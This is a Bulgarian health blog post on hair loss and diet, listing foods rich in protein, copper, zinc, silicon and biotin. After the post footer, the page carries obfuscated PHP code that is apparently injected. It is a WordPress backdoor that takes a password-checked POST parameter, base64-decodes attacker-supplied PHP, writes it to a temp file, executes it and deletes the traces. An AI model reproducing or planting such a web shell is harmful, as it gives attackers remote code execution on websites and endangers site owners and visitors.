Алопеция и хранене | Косопад

Алопеция и хранене

Косата, също като кожата и ноктите, постоянно се обновява, а нейният метаболизъм е много чувствителен към дефицита на вещества. Частичната или пълната загуба на коса се нарича алопеция.

алопеция

Липсата на вещества може да допринесе за алопецията, тъй като отслабва структурата, причинява късане и бавно обновяване. Липсата на желязо или анемията, причинена от дефицита му, могат да доведат до косопад и оплешивяване.

Косата е изградена и от други вещества, които също са минерали: магнезий, силиций, селен, мед. За да поддържате косата здрава, трябва да си гарантирате приема на тези вещества чрез храната:

1 . Трябва да приемате протеини с високо биологично качество: яйца, прясно мляко, сирене, риба.

2 . Мазнините от растителен произход (ядки и зехтин), които предпазват от изсушаване и чупене косата. Линоловата киселина (в олиото от слънчоглед и соя) е задължителна за блестяща и здрава коса.

3 . Храни, богати на мед: предпазва косата. Среща се в ядки като лешници, орехи, също в бобовите растения и соята.

Източници на цинк и протеини

Източници на цинк и протеини

4 . Храни, богати на силиций: среща се в пълнозърнестия ориз и мангото. Предпазва косата.

5 . Пиридоксина също предпазва косата. Среща се в житото, авокадото, овеса и царевицата.

6 . Храни богати на цинк: Много подходящи срещу косопад. Среща се в малините, целината, аспержите, смокините, картофите, бананите, патладжаните и яйцата.

7 . Бионтинът е много важен за здравето на косата, кожата и ноктите. Понякога липсата на биотин причинява косопад. Затова яжте яйца, черен дроб, бирена май, зърнени храни.

Разбира се, има още много причини, които могат да причинят косопад – нерви, стрес, околна среда, сезоните и др.

27. януари 2014 14:05:25 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}